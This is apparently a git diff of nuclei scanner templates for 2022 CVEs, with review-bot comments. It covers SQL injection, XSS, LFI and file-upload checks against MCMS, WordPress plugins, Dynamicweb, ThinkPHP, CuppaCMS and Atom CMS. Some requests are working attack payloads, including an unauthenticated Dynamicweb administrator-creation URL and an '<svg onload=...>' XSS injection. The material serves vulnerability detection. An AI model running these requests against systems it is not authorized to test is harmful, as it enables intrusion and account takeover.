@@ -34,17 +44,16 @@ requests: - type: word part: body_2 words: - - ".sh" - - ".cgi" + - .sh + - .cgi condition: and - type: word part: header_2 words: - - 'application/octet-stream' + - application/octet-stream - type: status status: - 200 - -# Enhanced by mp on 2022/11/05 +# digest: 4a0a00473045022100ab2d16fe98044552f6b033c5d66ef9d749c2577f4ba89980e3804e6e0961c42002204911d612998bfb262eb6fdacd0a6fc2a9e74331eeba778603ed15a039ec9d16b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25125.yaml b/nuclei-templates/CVE-2022/CVE-2022-25125.yaml index 043246a510..913fdf5257 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25125.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25125.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.4. reference: @@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25125 cwe-id: CWE-89 - epss-score: 0.02852 - epss-percentile: 0.8963 + epss-score: 0.02031 + epss-percentile: 0.87716 cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: product: mcms shodan-query: http.favicon.hash:1464851260 fofa-query: icon_hash="1464851260" - tags: cve,cve2022,sqli,mcms + tags: cve,cve2022,sqli,mcms,mingsoft variables: num: "999999999" 
@@ -50,4 +52,4 @@ http: part: header words: - "application/json" -# digest: 4b0a00483046022100c6463ded266946d46e2edb0a67c89eb88904eef7cf2be96f58cac0c75c29ccac022100a9cee00f6555f1de90a5503b62555fc3017f026c17d45980ef3dc5a0f4d43484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082b6a248202fef50a86c36616626d308355488ad6aa5d4ef24b183158f17b9b0022006b63a9e980e50f042f60dbe4457b4bd55a23a77f4cc51ce5d2057ae661a61b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25148.yaml b/nuclei-templates/CVE-2022/CVE-2022-25148.yaml index e1310c33f3..c60b1f9c37 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25148.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25148.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25148 cwe-id: CWE-89 epss-score: 0.10089 - epss-percentile: 0.9433 + epss-percentile: 0.94364 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: product: wp_statistics framework: wordpress google-query: inurl:/wp-content/plugins/wp-statistics - tags: packetstorm,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics + tags: cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: - raw: @@ -57,4 +57,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4a0a004730450220323da4ba93cc81baeafe1e713917846901f30b6c212d2cb8cf6ce7a7c2c22e65022100c2c6d5a4606e2cc8df6b4cf540732b9b3eba9ec1abc5b8ba02f0cbee0022c1f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ca848fcb45e23d7d210462b4aa7c89510aa622fe4bb4c0639f5035c1e09b2a5902205b9422a4700bd06f51bc7edd9a951403e9ad2145500336c3690f7beed9414f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25149.yaml b/nuclei-templates/CVE-2022/CVE-2022-25149.yaml index c5bf84fee7..3ee911d449 100644 
--- a/nuclei-templates/CVE-2022/CVE-2022-25149.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25149.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-25149 cwe-id: CWE-89 - epss-score: 0.34697 - epss-percentile: 0.96694 + epss-score: 0.36793 + epss-percentile: 0.97067 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: wp_statistics framework: wordpress publicwww-query: "/wp-content/plugins/wp-statistics/" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics + tags: cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: - raw: @@ -56,5 +56,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true - -# digest: 490a0046304402201bcfedf1e44cd62ccf0a31748b144dcf32170e93840348b01dbad2c1231a925f0220173607066561060333509d86c67f35b458792c76063fa62ed4dfc5dd910c37ff:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f3ab364d23921ccdb931455c9ebd80865bd26ddd8d85a85e5c2f6fc86842424e022068720cfe546b2bb14a734450dfc5bdad56751bcdaef77f99acb548fddcb1ac38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25323.yaml b/nuclei-templates/CVE-2022/CVE-2022-25323.yaml deleted file mode 100644 index 4500863480..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-25323.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: CVE-2022-25323 - -info: - name: ZEROF Web Server 2.0 Cross-Site Scripting - author: pikpikcu - severity: medium - description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. - reference: - - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 - tags: xss,cve,cve2022,zerof - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2022-25323 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/admin.back" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'back' - condition: and - - - type: status - status: - - 401 - -# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2535.yaml b/nuclei-templates/CVE-2022/CVE-2022-2535.yaml index 5054d69415..1f9bd68c13 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2535.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2535.yaml @@ -10,13 +10,14 @@ info: reference: - https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02 - https://nvd.nist.gov/vuln/detail/CVE-2022-2535 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-2535 cwe-id: CWE-639 - epss-score: 0.00271 - epss-percentile: 0.64341 + epss-score: 0.00198 + epss-percentile: 0.56687 cpe: cpe:2.3:a:searchwp:searchwp_live_ajax_search:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +26,7 @@ info: product: searchwp_live_ajax_search framework: wordpress publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" - tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search + tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp http: - method: GET 
@@ -39,4 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "searchwp-live-search-result")' condition: and -# digest: 490a004630440220524b9cb9dedd5532a69a351575996f8464fb2fce059b85f4398980f70f77bde50220678216cae0fc38768e67acbf4502593df797e5f85fc2dc605c06ae44282e0327:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c29befeae02b026b93a42c98ea54d1b6f5efaa102360055dbea4e7481f39b2f022100ad34ac1dc40f5d04fff554cad7674c9ca60fdd3db66a66b792e9e79ff14bca98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25356.yaml b/nuclei-templates/CVE-2022/CVE-2022-25356.yaml index 32725a1f9a..318df7ba5a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25356.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25356.yaml 
@@ -1,27 +1,38 @@ id: CVE-2022-25356 info: - name: Alt-N MDaemon Security Gateway - XML Injection + name: Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection author: Akincibor severity: medium description: | - In Alt-n Security Gateway product, a malicious actor could inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. In this way the XML parser fails the validation process disclosing information such as kind of protection used (2FA), admin email and product registration keys. + Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious XML code, leading to various security risks such as information disclosure, privilege escalation. + remediation: | + Upgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability. 
reference: - https://www.swascan.com/security-advisory-alt-n-security-gateway/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-25356 - https://www.altn.com/Products/SecurityGateway-Email-Firewall/ - https://www.swascan.com/security-blog/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-25356 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-25356 cwe-id: CWE-91 + epss-score: 0.00425 + epss-percentile: 0.73853 + cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: altn + product: securitygateway google-query: inurl:"/SecurityGateway.dll" - verified: "true" tags: cve,cve2022,altn,gateway,xml,injection -requests: +http: - method: GET path: - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1' @@ -39,3 +50,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502207eaf7f3b8339b01fbf9d09efa0a1c48df53a4c44ce469786dd22d682531bb04d022100b158dfc406ffdb342ad75451f95e9b78f8fa9072ec60c97cfcb702e67a2736f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25369.yaml b/nuclei-templates/CVE-2022/CVE-2022-25369.yaml index 27006db770..38ab8f6953 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25369.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25369.yaml 
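Review bot: The added `impact` text claims the issue can lead to "privilege escalation", which neither the description nor the classification in the same hunk supports: the vector is `AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` (confidentiality only, score 5.3) and the description says the parser error discloses 2FA status, admin email and registration keys. Overstating the impact undermines triage for anyone reading the finding. I would trim it to what the references show, e.g. `impact: | An unauthenticated attacker can read configuration details (2FA status, administrator email, product registration keys) from the error response.`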
@@ -5,20 +5,21 @@ info: author: pdteam severity: critical description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. - remediation: "Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0." + remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.' reference: - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369 - metadata: - shodan-query: http.component:"Dynamicweb" - tags: cve,cve2022,dynamicweb,rce,unauth classification: - cve-id: CVE-2022-25369 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2022-25369 cwe-id: CWE-425 + metadata: + max-request: 1 + shodan-query: http.component:"Dynamicweb" + tags: cve2022,cve,dynamicweb,rce,unauth -requests: +http: - method: GET path: - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test" @@ -43,5 +44,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs on 2022/02/28 +# digest: 4a0a00473045022100b7f35452dbfcd48834f3400c73dcf201cc3872265ccf60c523480c1d6cee56fd02202c82c05a62a41f20bff8ca897e0fbf249b14b87a0da1aa8d03aebb40c626803d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2544.yaml b/nuclei-templates/CVE-2022/CVE-2022-2544.yaml index 4e2dd15049..e69d88d917 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2544.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2544.yaml 
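Review bot: This template is state-changing: the GET to `Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}...` creates a persistent administrator on a vulnerable target, yet the reordered tags `cve2022,cve,dynamicweb,rce,unauth` still carry no `intrusive` marker, and the randomly generated credentials are not surfaced anywhere, so the account cannot be removed after the scan. I would add `intrusive` to the tags and a comment on the request, `# Intrusive: creates a new administrator account with random credentials; there is no cleanup step`, and consider an extractor for the generated username so the owner can delete it. The matcher section continues outside the first hunk.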
@@ -5,27 +5,40 @@ info: author: tess severity: high description: WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes. + impact: | + An attacker can access sensitive files and potentially obtain sensitive information from the target system. + remediation: | + Update to the latest version of the WordPress Ninja Job Board plugin (1.3.3) to fix the vulnerability. reference: - https://plugins.trac.wordpress.org/changeset/2758420/ninja-job-board/trunk/includes/Classes/File/FileHandler.php?old=2126467&old_path=ninja-job-board%2Ftrunk%2Fincludes%2FClasses%2FFile%2FFileHandler.php - https://wpscan.com/vulnerability/a9bcc68c-eeda-4647-8463-e7e136733053 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2544 - https://nvd.nist.gov/vuln/detail/CVE-2022-2544 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-2544 cwe-id: CWE-425 + epss-score: 0.00551 + epss-percentile: 0.7513 + cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:* metadata: verified: true - tags: ninja,exposure,wpscan,cve,cve2022,wordpress,wp-plugin,wp + max-request: 2 + vendor: wpmanageninja + product: ninja_job_board + framework: wordpress + tags: cve2022,cve,ninja,exposure,wpscan,wordpress,wp-plugin,wp,wpmanageninja -requests: +http: - method: GET path: - "{{BaseURL}}/wp/wp-content/uploads/wpjobboard/" - "{{BaseURL}}/wp-content/uploads/wpjobboard/" stop-at-first-match: true + matchers-condition: and matchers: - type: word 
@@ -42,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4b0a00483046022100c3064d8709e47d8bc7b434502a27234fba508fca7c1339c6d99d091e98228c08022100d2289a0c1c442dc09404549115ed1975e200909c8473604550aa76083464a23d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2546.yaml b/nuclei-templates/CVE-2022/CVE-2022-2546.yaml index c6e9df6c1e..a8a68d14b5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2546.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2546.yaml 
@@ -6,21 +6,33 @@ info: severity: medium description: | WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to the latest version of the WordPress All-in-One WP Migration plugin (7.63 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58 - https://wordpress.org/plugins/all-in-one-wp-migration/ - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2022-2546 + - https://github.com/0xvinix/CVE-2022-2546 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.7 cve-id: CVE-2022-2546 cwe-id: CWE-79 + epss-score: 0.00252 + epss-percentile: 0.64447 + cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,all-in-one-wp-migration,authenticated,wpscan,cve2022,wordpress,wp-plugin,wp,xss + verified: true + max-request: 3 + vendor: servmask + product: all-in-one_wp_migration + framework: wordpress + tags: cve,cve2022,all-in-one-wp-migration,authenticated,wpscan,wordpress,wp-plugin,wp,xss,servmask -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -28,21 +40,17 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1 Host: {{Hostname}} - - | GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: - - contains(all_headers_3, "text/html") + - contains(header_3, "text/html") - status_code_3 == 200 - contains(body_3, '{\"new_value\":[\"XSSPAYLOAD') condition: and @@ -54,5 +62,4 @@ requests: regex: - 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"' internal: true - -# Enhanced by mp on 2022/10/05 +# digest: 4b0a00483046022100b7d06ce856a168a95b454d4325f60f812325ac99d80ba9a9b145c641a5457c16022100c7ea3daf3be143b3953ed74dea7edd703e5b7825a231fba31a84de3c93d919c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25481.yaml b/nuclei-templates/CVE-2022/CVE-2022-25481.yaml index a8d5154ea3..98eb3f6fa7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25481.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25481.yaml 
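Review bot: The DSL matcher only proves that the prefix `{"new_value":["XSSPAYLOAD` is echoed back, not that the script portion survives unencoded, so a build that HTML-encodes `<svg onload=...>` while still reflecting the prefix would be reported as vulnerable. Adding a fourth condition such as `- contains(body_3, '<svg onload=alert(document.domain)>')` would pin the actual injection rather than mere reflection. The hunk also drops `cookie-reuse: true` and `req-condition: true`; that is fine if this repository targets a nuclei release where session reuse is the default and `_3`-suffixed DSL variables enable multi-request evaluation implicitly, but on an older engine the third request would lose the wp-login session and the `secret_key` extractor would never populate, so it may be worth stating the minimum engine version in the template. The extractor block that feeds `{{secretkey}}` begins outside this hunk.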
@@ -6,20 +6,33 @@ info: severity: high description: | ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. + remediation: | + Upgrade to a patched version of ThinkPHP or apply the necessary security patches. reference: - https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md - https://nvd.nist.gov/vuln/detail/CVE-2022-25481 + - https://github.com/20142995/sectool + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-25481 cwe-id: CWE-668 + epss-score: 0.01261 + epss-percentile: 0.85321 + cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: thinkphp + product: thinkphp shodan-query: title:"ThinkPHP" - verified: "true" tags: cve,cve2022,thinkphp,exposure,oss -requests: +http: - method: GET path: - '{{BaseURL}}/index.php?s=example' @@ -27,17 +40,17 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - - "ThinkPHP" - - - type: word - words: - - "HttpException" - - "TRACE" - condition: or + - "Exception" + - "REQUEST_TIME" + - "ThinkPHP Constants" + condition: and - type: status status: + - 200 + - 500 - 404 - -# Enhanced by md on 2023/02/03 + condition: or +# digest: 4a0a004730450220152a665e7b3a3c19077e3bf8a9d5f588afd66692737ed127dea8c823f9a1dd04022100d65ce7ec17220bbd6cfd2f3278886cd52b2f34beaae8509405bcfd1affd9940f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
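Review bot: The added remediation (`Upgrade to a patched version of ThinkPHP or apply the necessary security patches.`) gives the reader nothing actionable, while the new matcher words `REQUEST_TIME` and `ThinkPHP Constants` look like the content of ThinkPHP's verbose exception/trace page, which suggests the practical fix is disabling debug and trace output for production deployments — this should be confirmed against the referenced VulnDiscover write-up before wording it that way. The status matcher now lists `200`, `500` and `404` with an explicit `condition: or`, which is redundant because a status matcher already accepts any listed code; dropping the `condition:` line keeps the template consistent with the other status matchers in this commit. Requiring all three body words with `condition: and` is a sensible tightening over the old `HttpException`/`TRACE` `or` match.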
diff --git a/nuclei-templates/CVE-2022/CVE-2022-25485.yaml b/nuclei-templates/CVE-2022/CVE-2022-25485.yaml index b508954d69..655d49991d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25485.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25485.yaml @@ -6,25 +6,28 @@ info: severity: high description: | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-25485 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25485 cwe-id: CWE-829 epss-score: 0.00648 - epss-percentile: 0.77011 + epss-percentile: 0.78876 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa + tags: cve,cve2022,lfi,cuppa,cuppacms http: - raw: @@ -44,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220569acdf64fb43a458ea70830e8af110bd0511da283c468c26032f3644918a251022058e8369ec64ae1526c9d2f04581fc8e70449de2aeb8543879a63cb7989c2310c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220695bf0015ba99c93acd63afca4128b2148ff5a27a7932b4643c859aeb61a42c4022044e70aebbbea707f05244a3f7616eaf4faf0449294f9689bcfc0fffc730fb702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25486.yaml b/nuclei-templates/CVE-2022/CVE-2022-25486.yaml index 3b954228f2..7c0e1a6919 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25486.yaml 
+++ b/nuclei-templates/CVE-2022/CVE-2022-25486.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability. reference: @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-25486 cwe-id: CWE-829 epss-score: 0.01775 - epss-percentile: 0.8663 + epss-percentile: 0.8667 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa + tags: cve,cve2022,lfi,cuppa,cuppacms http: - raw: @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022052a39ab7f71484097704ee4d86f7dd9429ce4f99ae1528bc96ac3379eae36e2402203c2f7671bb11ba721aaef6f31e8488e167de9a97d91eded69e2c9f72595d5c78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9af1a8a2a7a6a3c65fffdd36d187033e9d8f9359c5ba7fbdf1c7e7522ab3a7c02200b66649c50c196fe79d3fd5010175cc3440562f4bb473c24296993c71c05f7d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25487.yaml b/nuclei-templates/CVE-2022/CVE-2022-25487.yaml index 662378abb9..5fe7a52c5e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25487.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25487.yaml 
@@ -6,25 +6,32 @@ info: severity: critical description: | Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Fixed in version Atom CMS v2.1 reference: - https://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html - https://github.com/thedigicraft/Atom.CMS/issues/256 - https://nvd.nist.gov/vuln/detail/CVE-2022-25487 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25487 cwe-id: CWE-434 - epss-score: 0.88802 - epss-percentile: 0.98414 + epss-score: 0.84615 + epss-percentile: 0.98422 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,rce,atom,cms,unauth,packetstorm,intrusive + tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload + +variables: + string: "CVE-2022-25487" http: - raw: @@ -42,7 +49,7 @@ http: Content-Type: image/jpeg - + -----------------------------30623082103363803402542706041-- - | GET /uploads/{(unknown)} HTTP/1.1 @@ -53,16 +60,7 @@ http: - type: word part: body words: - - 7ee3686858eb89dd68ccf85f0ea03abe - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 + - '{{md5(string)}}' extractors: - type: regex 
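Review bot: The new tag list contains the misspelling `fielupload`, which will never match a `-tags fileupload` filter; the line should read `tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fileupload`. Replacing the fixed hash with `{{md5(string)}}` over `variables: string: "CVE-2022-25487"` is a reasonable way to keep the marker unique, but the hunk also removes the `text/html` header and `200` status matchers, so the result now rests on a single body word; if `matchers-condition: and` is still present above the matcher list (it is outside the hunk) it is now redundant with one matcher. The multipart body that the uploaded payload comes from is also outside the visible hunk, so I cannot confirm it echoes the same md5 value.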
@@ -71,4 +69,4 @@ http: regex: - SET avatar = '(.*?)' internal: true -# digest: 490a0046304402205f0e1b05a022e94ca8828221c462990afcbac3f03d3b8c39f458f6a2441fb4c10220075e62f2bd3a5fa8bf4be5e1eadc9f7e20c86d43cba26f0ff1df6c3874281fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043022053b2e71d759824bf37ef2cafa971723f16645d2288e9f56f34337b2cc04e3522021f2d387dd0cd19bc32b46742661ac827c6e9f2781f7ee711c0df141fc4303737:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25488.yaml b/nuclei-templates/CVE-2022/CVE-2022-25488.yaml index ec3069ff9f..83ddbb55db 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25488.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25488.yaml @@ -6,24 +6,28 @@ info: severity: critical description: | Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/257 - https://nvd.nist.gov/vuln/detail/CVE-2022-25488 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/superlink996/chunqiuyunjingbachang classification: cvss-metrics: 